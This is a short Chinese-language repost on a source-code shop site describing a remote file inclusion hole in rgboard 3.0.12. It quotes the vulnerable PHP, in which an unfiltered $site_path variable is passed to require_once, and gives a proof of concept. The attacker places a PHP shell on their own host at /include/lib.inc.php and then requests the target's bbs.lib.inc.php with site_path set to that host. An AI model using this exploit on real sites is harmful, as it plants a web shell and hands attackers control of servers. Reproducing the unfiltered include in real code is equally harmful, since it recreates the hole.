源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

rgboard 3.0.12 远程文件包含漏洞

  • 时间:2021-04-30 08:29 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:rgboard 3.0.12 远程文件包含漏洞
vul code: \include\bbs.lib.inc.php: if (!defined('BBS_LIB_INC_INCLUDED')) { define('BBS_LIB_INC_INCLUDED', 1); // *– BBS_LIB_INC_INCLUDED START –* if(!$site_path) $site_path='./'; require_once “{$site_path}include/lib.inc.php”; //$site_path没有过滤直接放过来包含了 poc: 在你的网站放个phpshell,目录和文件名为/include/lib.inc.php 然后访问 httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部